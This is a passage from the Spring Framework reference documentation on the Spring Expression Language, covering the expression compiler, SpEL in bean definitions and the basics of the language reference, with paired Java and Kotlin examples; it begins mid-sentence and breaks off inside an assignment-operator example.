runtime and uses that\nclass to achieve much faster expression evaluation. Due to the lack of typing around\nexpressions, the compiler uses information gathered during the interpreted evaluations\nof an expression when performing compilation. For example, it does not know the type\nof a property reference purely from the expression, but during the first interpreted\nevaluation, it finds out what it is. Of course, basing compilation on such derived\ninformation can cause trouble later if the types of the various expression elements\nchange over time. For this reason, compilation is best suited to expressions whose\ntype information is not going to change on repeated evaluations.\n\nConsider the following basic expression:\n\n----\nsomeArray[0].someProperty.someOtherProperty < 0.1\n----\n\nBecause the preceding expression involves array access, some property de-referencing,\nand numeric operations, the performance gain can be very noticeable. In an example\nmicro benchmark run of 50000 iterations, it took 75ms to evaluate by using the\ninterpreter and only 3ms using the compiled version of the expression.\n\n\n[[expressions-compiler-configuration]]\n==== Compiler Configuration\n\nThe compiler is not turned on by default, but you can turn it on in either of two\ndifferent ways. You can turn it on by using the parser configuration process\n(<<expressions-parser-configuration, discussed earlier>>) or by using a system\nproperty when SpEL usage is embedded inside another component. This section\ndiscusses both of these options.\n\nThe compiler can operate in one of three modes, which are captured in the\n`org.springframework.expression.spel.SpelCompilerMode` enum. The modes are as follows:\n\n* `OFF` (default): The compiler is switched off.\n* `IMMEDIATE`: In immediate mode, the expressions are compiled as soon as possible. This\nis typically after the first interpreted evaluation. If the compiled expression fails\n(typically due to a type changing, as described earlier), the caller of the expression\nevaluation receives an exception.\n* `MIXED`: In mixed mode, the expressions silently switch between interpreted and compiled\nmode over time. After some number of interpreted runs, they switch to compiled\nform and, if something goes wrong with the compiled form (such as a type changing, as\ndescribed earlier), the expression automatically switches back to interpreted form\nagain. Sometime later, it may generate another compiled form and switch to it. Basically,\nthe exception that the user gets in `IMMEDIATE` mode is instead handled internally.\n\n`IMMEDIATE` mode exists because `MIXED` mode could cause issues for expressions that\nhave side effects. If a compiled expression blows up after partially succeeding, it\nmay have already done something that has affected the state of the system. If this\nhas happened, the caller may not want it to silently re-run in interpreted mode,\nsince part of the expression may be running twice.\n\nAfter selecting a mode, use the `SpelParserConfiguration` to configure the parser. The\nfollowing example shows how to do so:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tSpelParserConfiguration config = new SpelParserConfiguration(SpelCompilerMode.IMMEDIATE,\n\t\tthis.getClass().getClassLoader());\n\n\tSpelExpressionParser parser = new SpelExpressionParser(config);\n\n\tExpression expr = parser.parseExpression(\"payload\");\n\n\tMyMessage message = new MyMessage();\n\n\tObject payload = expr.getValue(message);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval config = SpelParserConfiguration(SpelCompilerMode.IMMEDIATE,\n\t\t\tthis.javaClass.classLoader)\n\n\tval parser = SpelExpressionParser(config)\n\n\tval expr = parser.parseExpression(\"payload\")\n\n\tval message = MyMessage()\n\n\tval payload = expr.getValue(message)\n----\n\nWhen you specify the compiler mode, you can also specify a classloader (passing null is allowed).\nCompiled expressions are defined in a child classloader created under any that is supplied.\nIt is important to ensure that, if a classloader is specified, it can see all the types involved in\nthe expression evaluation process. If you do not specify a classloader, a default classloader is used\n(typically the context classloader for the thread that is running during expression evaluation).\n\nThe second way to configure the compiler is for use when SpEL is embedded inside some other\ncomponent and it may not be possible to configure it through a configuration object. In these\ncases, it is possible to use a system property. You can set the `spring.expression.compiler.mode`\nproperty to one of the `SpelCompilerMode` enum values (`off`, `immediate`, or `mixed`).\n\n\n[[expressions-compiler-limitations]]\n==== Compiler Limitations\n\nSince Spring Framework 4.1, the basic compilation framework is in place. However, the framework\ndoes not yet support compiling every kind of expression. The initial focus has been on the\ncommon expressions that are likely to be used in performance-critical contexts. The following\nkinds of expression cannot be compiled at the moment:\n\n* Expressions involving assignment\n* Expressions relying on the conversion service\n* Expressions using custom resolvers or accessors\n* Expressions using selection or projection\n\nMore types of expression will be compilable in the future.\n\n\n\n\n[[expressions-beandef]]\n== Expressions in Bean Definitions\n\nYou can use SpEL expressions with XML-based or annotation-based configuration metadata for\ndefining `BeanDefinition` instances. In both cases, the syntax to define the expression is of the\nform `#{ <expression string> }`.\n\n\n\n[[expressions-beandef-xml-based]]\n=== XML Configuration\n\nA property or constructor argument value can be set by using expressions, as the following\nexample shows:\n\n[source,xml,indent=0,subs=\"verbatim\"]\n----\n\t<bean id=\"numberGuess\" class=\"org.spring.samples.NumberGuess\">\n\t\t<property name=\"randomNumber\" value=\"#{ T(java.lang.Math).random() * 100.0 }\"\/>\n\n\t\t<!-- other properties -->\n\t<\/bean>\n----\n\nAll beans in the application context are available as predefined variables with their\ncommon bean name. This includes standard context beans such as `environment` (of type\n`org.springframework.core.env.Environment`) as well as `systemProperties` and\n`systemEnvironment` (of type `Map<String, Object>`) for access to the runtime environment.\n\nThe following example shows access to the `systemProperties` bean as a SpEL variable:\n\n[source,xml,indent=0,subs=\"verbatim\"]\n----\n\t<bean id=\"taxCalculator\" class=\"org.spring.samples.TaxCalculator\">\n\t\t<property name=\"defaultLocale\" value=\"#{ systemProperties['user.region'] }\"\/>\n\n\t\t<!-- other properties -->\n\t<\/bean>\n----\n\nNote that you do not have to prefix the predefined variable with the `#` symbol here.\n\nYou can also refer to other bean properties by name, as the following example shows:\n\n[source,xml,indent=0,subs=\"verbatim\"]\n----\n\t<bean id=\"numberGuess\" class=\"org.spring.samples.NumberGuess\">\n\t\t<property name=\"randomNumber\" value=\"#{ T(java.lang.Math).random() * 100.0 }\"\/>\n\n\t\t<!-- other properties -->\n\t<\/bean>\n\n\t<bean id=\"shapeGuess\" class=\"org.spring.samples.ShapeGuess\">\n\t\t<property name=\"initialShapeSeed\" value=\"#{ numberGuess.randomNumber }\"\/>\n\n\t\t<!-- other properties -->\n\t<\/bean>\n----\n\n\n\n[[expressions-beandef-annotation-based]]\n=== Annotation Configuration\n\nTo specify a default value, you can place the `@Value` annotation on fields, methods,\nand method or constructor parameters.\n\nThe following example sets the default value of a field variable:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\tpublic class FieldValueTestBean {\n\n\t\t\t@Value(\"#{ systemProperties['user.region'] }\")\n\t\t\tprivate String defaultLocale;\n\n\t\t\tpublic void setDefaultLocale(String defaultLocale) {\n\t\t\t\tthis.defaultLocale = defaultLocale;\n\t\t\t}\n\n\t\t\tpublic String getDefaultLocale() {\n\t\t\t\treturn this.defaultLocale;\n\t\t\t}\n\t\t}\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tclass FieldValueTestBean {\n\n\t\t@Value(\"#{ systemProperties['user.region'] }\")\n\t\tvar defaultLocale: String? = null\n\t}\n----\n\nThe following example shows the equivalent but on a property setter method:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tpublic class PropertyValueTestBean {\n\n\t\tprivate String defaultLocale;\n\n\t\t@Value(\"#{ systemProperties['user.region'] }\")\n\t\tpublic void setDefaultLocale(String defaultLocale) {\n\t\t\tthis.defaultLocale = defaultLocale;\n\t\t}\n\n\t\tpublic String getDefaultLocale() {\n\t\t\treturn this.defaultLocale;\n\t\t}\n\t}\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tclass PropertyValueTestBean {\n\n\t\t@Value(\"#{ systemProperties['user.region'] }\")\n\t\tvar defaultLocale: String? = null\n\t}\n----\n\nAutowired methods and constructors can also use the `@Value` annotation, as the following\nexamples show:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tpublic class SimpleMovieLister {\n\n\t\tprivate MovieFinder movieFinder;\n\t\tprivate String defaultLocale;\n\n\t\t@Autowired\n\t\tpublic void configure(MovieFinder movieFinder,\n\t\t\t\t@Value(\"#{ systemProperties['user.region'] }\") String defaultLocale) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t\tthis.defaultLocale = defaultLocale;\n\t\t}\n\n\t\t\/\/ ...\n\t}\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tclass SimpleMovieLister {\n\n\t\tprivate lateinit var movieFinder: MovieFinder\n\t\tprivate lateinit var defaultLocale: String\n\n\t\t@Autowired\n\t\tfun configure(movieFinder: MovieFinder,\n\t\t\t\t\t@Value(\"#{ systemProperties['user.region'] }\") defaultLocale: String) {\n\t\t\tthis.movieFinder = movieFinder\n\t\t\tthis.defaultLocale = defaultLocale\n\t\t}\n\n\t\t\/\/ ...\n\t}\n----\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tpublic class MovieRecommender {\n\n\t\tprivate String defaultLocale;\n\n\t\tprivate CustomerPreferenceDao customerPreferenceDao;\n\n\t\tpublic MovieRecommender(CustomerPreferenceDao customerPreferenceDao,\n\t\t\t\t@Value(\"#{systemProperties['user.country']}\") String defaultLocale) {\n\t\t\tthis.customerPreferenceDao = customerPreferenceDao;\n\t\t\tthis.defaultLocale = defaultLocale;\n\t\t}\n\n\t\t\/\/ ...\n\t}\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tclass MovieRecommender(private val customerPreferenceDao: CustomerPreferenceDao,\n\t\t\t\t@Value(\"#{systemProperties['user.country']}\") private val defaultLocale: String) {\n\t\t\/\/ ...\t\n\t}\n----\n\n\n\n\n[[expressions-language-ref]]\n== Language Reference\n\nThis section describes how the Spring Expression Language works. It covers the following\ntopics:\n\n* <<expressions-ref-literal>>\n* <<expressions-properties-arrays>>\n* <<expressions-inline-lists>>\n* <<expressions-inline-maps>>\n* <<expressions-array-construction>>\n* <<expressions-methods>>\n* <<expressions-operators>>\n* <<expressions-types>>\n* <<expressions-constructors>>\n* <<expressions-ref-variables>>\n* <<expressions-ref-functions>>\n* <<expressions-bean-references>>\n* <<expressions-operator-ternary>>\n* <<expressions-operator-elvis>>\n* <<expressions-operator-safe-navigation>>\n\n\n\n[[expressions-ref-literal]]\n=== Literal Expressions\n\nThe types of literal expressions supported are strings, numeric values (int, real, hex),\nboolean, and null. Strings are delimited by single quotation marks. To put a single quotation mark itself\nin a string, use two single quotation mark characters.\n\nThe following listing shows simple usage of literals. Typically, they are not used\nin isolation like this but, rather, as part of a more complex expression -- for example,\nusing a literal on one side of a logical comparison operator.\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\n\t\/\/ evals to \"Hello World\"\n\tString helloWorld = (String) parser.parseExpression(\"'Hello World'\").getValue();\n\n\tdouble avogadrosNumber = (Double) parser.parseExpression(\"6.0221415E+23\").getValue();\n\n\t\/\/ evals to 2147483647\n\tint maxValue = (Integer) parser.parseExpression(\"0x7FFFFFFF\").getValue();\n\n\tboolean trueValue = (Boolean) parser.parseExpression(\"true\").getValue();\n\n\tObject nullValue = parser.parseExpression(\"null\").getValue();\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\n\t\/\/ evals to \"Hello World\"\n\tval helloWorld = parser.parseExpression(\"'Hello World'\").value as String\n\n\tval avogadrosNumber = parser.parseExpression(\"6.0221415E+23\").value as Double\n\n\t\/\/ evals to 2147483647\n\tval maxValue = parser.parseExpression(\"0x7FFFFFFF\").value as Int\n\n\tval trueValue = parser.parseExpression(\"true\").value as Boolean\n\n\tval nullValue = parser.parseExpression(\"null\").value\n----\n\nNumbers support the use of the negative sign, exponential notation, and decimal points.\nBy default, real numbers are parsed by using Double.parseDouble().\n\n\n\n[[expressions-properties-arrays]]\n=== Properties, Arrays, Lists, Maps, and Indexers\n\nNavigating with property references is easy. To do so, use a period to indicate a nested\nproperty value. The instances of the `Inventor` class, `pupin` and `tesla`, were populated with\ndata listed in the <<expressions-example-classes, Classes used in the examples>> section.\nTo navigate \"`down`\" and get Tesla's year of birth and Pupin's city of birth, we use the following\nexpressions:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ evals to 1856\n\tint year = (Integer) parser.parseExpression(\"Birthdate.Year + 1900\").getValue(context);\n\n\tString city = (String) parser.parseExpression(\"placeOfBirth.City\").getValue(context);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ evals to 1856\n\tval year = parser.parseExpression(\"Birthdate.Year + 1900\").getValue(context) as Int\n\n\tval city = parser.parseExpression(\"placeOfBirth.City\").getValue(context) as String\n----\n\nCase insensitivity is allowed for the first letter of property names. The contents of\narrays and lists are obtained by using square bracket notation, as the following example\nshows:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tExpressionParser parser = new SpelExpressionParser();\n\tEvaluationContext context = SimpleEvaluationContext.forReadOnlyDataBinding().build();\n\n\t\/\/ Inventions Array\n\n\t\/\/ evaluates to \"Induction motor\"\n\tString invention = parser.parseExpression(\"inventions[3]\").getValue(\n\t\t\tcontext, tesla, String.class);\n\n\t\/\/ Members List\n\n\t\/\/ evaluates to \"Nikola Tesla\"\n\tString name = parser.parseExpression(\"members[0].name\").getValue(\n\t\t\tcontext, ieee, String.class);\n\n\t\/\/ List and Array navigation\n\t\/\/ evaluates to \"Wireless communication\"\n\tString invention = parser.parseExpression(\"members[0].inventions[6]\").getValue(\n\t\t\tcontext, ieee, String.class);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval parser = SpelExpressionParser()\n\tval context = SimpleEvaluationContext.forReadOnlyDataBinding().build()\n\n\t\/\/ Inventions Array\n\n\t\/\/ evaluates to \"Induction motor\"\n\tval invention = parser.parseExpression(\"inventions[3]\").getValue(\n\t\t\tcontext, tesla, String::class.java)\n\n\t\/\/ Members List\n\n\t\/\/ evaluates to \"Nikola Tesla\"\n\tval name = parser.parseExpression(\"members[0].name\").getValue(\n\t\t\tcontext, ieee, String::class.java)\n\n\t\/\/ List and Array navigation\n\t\/\/ evaluates to \"Wireless communication\"\n\tval invention = parser.parseExpression(\"members[0].inventions[6]\").getValue(\n\t\t\tcontext, ieee, String::class.java)\n----\n\nThe contents of maps are obtained by specifying the literal key value within the\nbrackets. In the following example, because keys for the `officers` map are strings, we can specify\nstring literals:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ Officer's Dictionary\n\n\tInventor pupin = parser.parseExpression(\"officers['president']\").getValue(\n\t\t\tsocietyContext, Inventor.class);\n\n\t\/\/ evaluates to \"Idvor\"\n\tString city = parser.parseExpression(\"officers['president'].placeOfBirth.city\").getValue(\n\t\t\tsocietyContext, String.class);\n\n\t\/\/ setting values\n\tparser.parseExpression(\"officers['advisors'][0].placeOfBirth.country\").setValue(\n\t\t\tsocietyContext, \"Croatia\");\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ Officer's Dictionary\n\n\tval pupin = parser.parseExpression(\"officers['president']\").getValue(\n\t\t\tsocietyContext, Inventor::class.java)\n\n\t\/\/ evaluates to \"Idvor\"\n\tval city = parser.parseExpression(\"officers['president'].placeOfBirth.city\").getValue(\n\t\t\tsocietyContext, String::class.java)\n\n\t\/\/ setting values\n\tparser.parseExpression(\"officers['advisors'][0].placeOfBirth.country\").setValue(\n\t\t\tsocietyContext, \"Croatia\")\n----\n\n\n\n[[expressions-inline-lists]]\n=== Inline Lists\n\nYou can directly express lists in an expression by using `{}` notation.\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ evaluates to a Java list containing the four numbers\n\tList numbers = (List) parser.parseExpression(\"{1,2,3,4}\").getValue(context);\n\n\tList listOfLists = (List) parser.parseExpression(\"{{'a','b'},{'x','y'}}\").getValue(context);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ evaluates to a Java list containing the four numbers\n\tval numbers = parser.parseExpression(\"{1,2,3,4}\").getValue(context) as List<*>\n\n\tval listOfLists = parser.parseExpression(\"{{'a','b'},{'x','y'}}\").getValue(context) as List<*>\n----\n\n`{}` by itself means an empty list. For performance reasons, if the list is itself\nentirely composed of fixed literals, a constant list is created to represent the\nexpression (rather than building a new list on each evaluation).\n\n\n\n[[expressions-inline-maps]]\n=== Inline Maps\n\nYou can also directly express maps in an expression by using `{key:value}` notation. The\nfollowing example shows how to do so:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ evaluates to a Java map containing the two entries\n\tMap inventorInfo = (Map) parser.parseExpression(\"{name:'Nikola',dob:'10-July-1856'}\").getValue(context);\n\n\tMap mapOfMaps = (Map) parser.parseExpression(\"{name:{first:'Nikola',last:'Tesla'},dob:{day:10,month:'July',year:1856}}\").getValue(context);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ evaluates to a Java map containing the two entries\n\tval inventorInfo = parser.parseExpression(\"{name:'Nikola',dob:'10-July-1856'}\").getValue(context) as Map<*, *>\n\n\tval mapOfMaps = parser.parseExpression(\"{name:{first:'Nikola',last:'Tesla'},dob:{day:10,month:'July',year:1856}}\").getValue(context) as Map<*, *>\t\n----\n\n`{:}` by itself means an empty map. For performance reasons, if the map is itself composed\nof fixed literals or other nested constant structures (lists or maps), a constant map is created\nto represent the expression (rather than building a new map on each evaluation). Quoting of the map keys\nis optional. The examples above do not use quoted keys.\n\n\n\n[[expressions-array-construction]]\n=== Array Construction\n\nYou can build arrays by using the familiar Java syntax, optionally supplying an initializer\nto have the array populated at construction time. The following example shows how to do so:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tint[] numbers1 = (int[]) parser.parseExpression(\"new int[4]\").getValue(context);\n\n\t\/\/ Array with initializer\n\tint[] numbers2 = (int[]) parser.parseExpression(\"new int[]{1,2,3}\").getValue(context);\n\n\t\/\/ Multi dimensional array\n\tint[][] numbers3 = (int[][]) parser.parseExpression(\"new int[4][5]\").getValue(context);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval numbers1 = parser.parseExpression(\"new int[4]\").getValue(context) as IntArray\n\n\t\/\/ Array with initializer\n\tval numbers2 = parser.parseExpression(\"new int[]{1,2,3}\").getValue(context) as IntArray\n\n\t\/\/ Multi dimensional array\n\tval numbers3 = parser.parseExpression(\"new int[4][5]\").getValue(context) as Array<IntArray>\n----\n\nYou cannot currently supply an initializer when you construct\nmulti-dimensional array.\n\n\n\n[[expressions-methods]]\n=== Methods\n\nYou can invoke methods by using typical Java programming syntax. You can also invoke methods\non literals. Variable arguments are also supported. The following examples show how to\ninvoke methods:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ string literal, evaluates to \"bc\"\n\tString bc = parser.parseExpression(\"'abc'.substring(1, 3)\").getValue(String.class);\n\n\t\/\/ evaluates to true\n\tboolean isMember = parser.parseExpression(\"isMember('Mihajlo Pupin')\").getValue(\n\t\t\tsocietyContext, Boolean.class);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ string literal, evaluates to \"bc\"\n\tval bc = parser.parseExpression(\"'abc'.substring(1, 3)\").getValue(String::class.java)\n\n\t\/\/ evaluates to true\n\tval isMember = parser.parseExpression(\"isMember('Mihajlo Pupin')\").getValue(\n\t\t\tsocietyContext, Boolean::class.java)\n----\n\n\n[[expressions-operators]]\n=== Operators\n\nThe Spring Expression Language supports the following kinds of operators:\n\n* <<expressions-operators-relational>>\n* <<expressions-operators-logical>>\n* <<expressions-operators-mathematical>>\n* <<expressions-assignment>>\n\n\n[[expressions-operators-relational]]\n==== Relational Operators\n\nThe relational operators (equal, not equal, less than, less than or equal, greater than,\nand greater than or equal) are supported by using standard operator notation. The\nfollowing listing shows a few examples of operators:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ evaluates to true\n\tboolean trueValue = parser.parseExpression(\"2 == 2\").getValue(Boolean.class);\n\n\t\/\/ evaluates to false\n\tboolean falseValue = parser.parseExpression(\"2 < -5.0\").getValue(Boolean.class);\n\n\t\/\/ evaluates to true\n\tboolean trueValue = parser.parseExpression(\"'black' < 'block'\").getValue(Boolean.class);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ evaluates to true\n\tval trueValue = parser.parseExpression(\"2 == 2\").getValue(Boolean::class.java)\n\n\t\/\/ evaluates to false\n\tval falseValue = parser.parseExpression(\"2 < -5.0\").getValue(Boolean::class.java)\n\n\t\/\/ evaluates to true\n\tval trueValue = parser.parseExpression(\"'black' < 'block'\").getValue(Boolean::class.java)\n----\n\n[NOTE]\n====\nGreater-than and less-than comparisons against `null` follow a simple rule: `null` is treated as\nnothing (that is NOT as zero). As a consequence, any other value is always greater\nthan `null` (`X > null` is always `true`) and no other value is ever less than nothing\n(`X < null` is always `false`).\n\nIf you prefer numeric comparisons instead, avoid number-based `null` comparisons\nin favor of comparisons against zero (for example, `X > 0` or `X < 0`).\n====\n\nIn addition to the standard relational operators, SpEL supports the `instanceof` and regular\nexpression-based `matches` operator. The following listing shows examples of both:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ evaluates to false\n\tboolean falseValue = parser.parseExpression(\n\t\t\t\"'xyz' instanceof T(Integer)\").getValue(Boolean.class);\n\n\t\/\/ evaluates to true\n\tboolean trueValue = parser.parseExpression(\n\t\t\t\"'5.00' matches '^-?\\\\d+(\\\\.\\\\d{2})?$'\").getValue(Boolean.class);\n\n\t\/\/evaluates to false\n\tboolean falseValue = parser.parseExpression(\n\t\t\t\"'5.0067' matches '^-?\\\\d+(\\\\.\\\\d{2})?$'\").getValue(Boolean.class);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ evaluates to false\n\tval falseValue = parser.parseExpression(\n\t\t\t\"'xyz' instanceof T(Integer)\").getValue(Boolean::class.java)\n\n\t\/\/ evaluates to true\n\tval trueValue = parser.parseExpression(\n\t\t\t\"'5.00' matches '^-?\\\\d+(\\\\.\\\\d{2})?$'\").getValue(Boolean::class.java)\n\n\t\/\/evaluates to false\n\tval falseValue = parser.parseExpression(\n\t\t\t\"'5.0067' matches '^-?\\\\d+(\\\\.\\\\d{2})?$'\").getValue(Boolean::class.java)\n----\n\nCAUTION: Be careful with primitive types, as they are immediately boxed up to the wrapper type,\nso `1 instanceof T(int)` evaluates to `false` while `1 instanceof T(Integer)`\nevaluates to `true`, as expected.\n\nEach symbolic operator can also be specified as a purely alphabetic equivalent. This\navoids problems where the symbols used have special meaning for the document type in\nwhich the expression is embedded (such as in an XML document). The textual equivalents are:\n\n* `lt` (`<`)\n* `gt` (`>`)\n* `le` (`\\<=`)\n* `ge` (`>=`)\n* `eq` (`==`)\n* `ne` (`!=`)\n* `div` (`\/`)\n* `mod` (`%`)\n* `not` (`!`).\n\nAll of the textual operators are case-insensitive.\n\n\n[[expressions-operators-logical]]\n==== Logical Operators\n\nSpEL supports the following logical operators:\n\n* `and` (`&&`)\n* `or` (`||`)\n* `not` (`!`)\n\nThe following example shows how to use the logical operators\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ -- AND --\n\n\t\/\/ evaluates to false\n\tboolean falseValue = parser.parseExpression(\"true and false\").getValue(Boolean.class);\n\n\t\/\/ evaluates to true\n\tString expression = \"isMember('Nikola Tesla') and isMember('Mihajlo Pupin')\";\n\tboolean trueValue = parser.parseExpression(expression).getValue(societyContext, Boolean.class);\n\n\t\/\/ -- OR --\n\n\t\/\/ evaluates to true\n\tboolean trueValue = parser.parseExpression(\"true or false\").getValue(Boolean.class);\n\n\t\/\/ evaluates to true\n\tString expression = \"isMember('Nikola Tesla') or isMember('Albert Einstein')\";\n\tboolean trueValue = parser.parseExpression(expression).getValue(societyContext, Boolean.class);\n\n\t\/\/ -- NOT --\n\n\t\/\/ evaluates to false\n\tboolean falseValue = parser.parseExpression(\"!true\").getValue(Boolean.class);\n\n\t\/\/ -- AND and NOT --\n\tString expression = \"isMember('Nikola Tesla') and !isMember('Mihajlo Pupin')\";\n\tboolean falseValue = parser.parseExpression(expression).getValue(societyContext, Boolean.class);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ -- AND --\n\n\t\/\/ evaluates to false\n\tval falseValue = parser.parseExpression(\"true and false\").getValue(Boolean::class.java)\n\n\t\/\/ evaluates to true\n\tval expression = \"isMember('Nikola Tesla') and isMember('Mihajlo Pupin')\"\n\tval trueValue = parser.parseExpression(expression).getValue(societyContext, Boolean::class.java)\n\n\t\/\/ -- OR --\n\n\t\/\/ evaluates to true\n\tval trueValue = parser.parseExpression(\"true or false\").getValue(Boolean::class.java)\n\n\t\/\/ evaluates to true\n\tval expression = \"isMember('Nikola Tesla') or isMember('Albert Einstein')\"\n\tval trueValue = parser.parseExpression(expression).getValue(societyContext, Boolean::class.java)\n\n\t\/\/ -- NOT --\n\n\t\/\/ evaluates to false\n\tval falseValue = parser.parseExpression(\"!true\").getValue(Boolean::class.java)\n\n\t\/\/ -- AND and NOT --\n\tval expression = \"isMember('Nikola Tesla') and !isMember('Mihajlo Pupin')\"\n\tval falseValue = parser.parseExpression(expression).getValue(societyContext, Boolean::class.java)\n----\n\n\n[[expressions-operators-mathematical]]\n==== Mathematical Operators\n\nYou can use the addition operator on both numbers and strings. You can use the subtraction, multiplication,\nand division operators only on numbers. You can also use\nthe modulus (%) and exponential power (^) operators. Standard operator precedence is enforced. The\nfollowing example shows the mathematical operators in use:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\t\/\/ Addition\n\tint two = parser.parseExpression(\"1 + 1\").getValue(Integer.class); \/\/ 2\n\n\tString testString = parser.parseExpression(\n\t\t\t\"'test' + ' ' + 'string'\").getValue(String.class); \/\/ 'test string'\n\n\t\/\/ Subtraction\n\tint four = parser.parseExpression(\"1 - -3\").getValue(Integer.class); \/\/ 4\n\n\tdouble d = parser.parseExpression(\"1000.00 - 1e4\").getValue(Double.class); \/\/ -9000\n\n\t\/\/ Multiplication\n\tint six = parser.parseExpression(\"-2 * -3\").getValue(Integer.class); \/\/ 6\n\n\tdouble twentyFour = parser.parseExpression(\"2.0 * 3e0 * 4\").getValue(Double.class); \/\/ 24.0\n\n\t\/\/ Division\n\tint minusTwo = parser.parseExpression(\"6 \/ -3\").getValue(Integer.class); \/\/ -2\n\n\tdouble one = parser.parseExpression(\"8.0 \/ 4e0 \/ 2\").getValue(Double.class); \/\/ 1.0\n\n\t\/\/ Modulus\n\tint three = parser.parseExpression(\"7 % 4\").getValue(Integer.class); \/\/ 3\n\n\tint one = parser.parseExpression(\"8 \/ 5 % 2\").getValue(Integer.class); \/\/ 1\n\n\t\/\/ Operator precedence\n\tint minusTwentyOne = parser.parseExpression(\"1+2-3*8\").getValue(Integer.class); \/\/ -21\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\t\/\/ Addition\n\tval two = parser.parseExpression(\"1 + 1\").getValue(Int::class.java) \/\/ 2\n\n\tval testString = parser.parseExpression(\n\t\t\t\"'test' + ' ' + 'string'\").getValue(String::class.java) \/\/ 'test string'\n\n\t\/\/ Subtraction\n\tval four = parser.parseExpression(\"1 - -3\").getValue(Int::class.java) \/\/ 4\n\n\tval d = parser.parseExpression(\"1000.00 - 1e4\").getValue(Double::class.java) \/\/ -9000\n\n\t\/\/ Multiplication\n\tval six = parser.parseExpression(\"-2 * -3\").getValue(Int::class.java) \/\/ 6\n\n\tval twentyFour = parser.parseExpression(\"2.0 * 3e0 * 4\").getValue(Double::class.java) \/\/ 24.0\n\n\t\/\/ Division\n\tval minusTwo = parser.parseExpression(\"6 \/ -3\").getValue(Int::class.java) \/\/ -2\n\n\tval one = parser.parseExpression(\"8.0 \/ 4e0 \/ 2\").getValue(Double::class.java) \/\/ 1.0\n\n\t\/\/ Modulus\n\tval three = parser.parseExpression(\"7 % 4\").getValue(Int::class.java) \/\/ 3\n\n\tval one = parser.parseExpression(\"8 \/ 5 % 2\").getValue(Int::class.java) \/\/ 1\n\n\t\/\/ Operator precedence\n\tval minusTwentyOne = parser.parseExpression(\"1+2-3*8\").getValue(Int::class.java) \/\/ -21\t\n----\n\n\n[[expressions-assignment]]\n==== The Assignment Operator\n\nTo setting a property, use the assignment operator (`=`). This is typically\ndone within a call to `setValue` but can also be done inside a call to `getValue`. The\nfollowing listing shows both ways to use the assignment operator:\n\n[source,java,indent=0,subs=\"verbatim,quotes\",role=\"primary\"]\n.Java\n----\n\tInventor inventor = new Inventor();\n\tEvaluationContext context = SimpleEvaluationContext.forReadWriteDataBinding().build();\n\n\tparser.parseExpression(\"name\").setValue(context, inventor, \"Aleksandar Seovic\");\n\n\t\/\/ alternatively\n\tString aleks = parser.parseExpression(\n\t\t\t\"name = 'Aleksandar Seovic'\").getValue(context, inventor, String.class);\n----\n[source,kotlin,indent=0,subs=\"verbatim,quotes\",role=\"secondary\"]\n.Kotlin\n----\n\tval inventor = Inventor()\n\tval context = 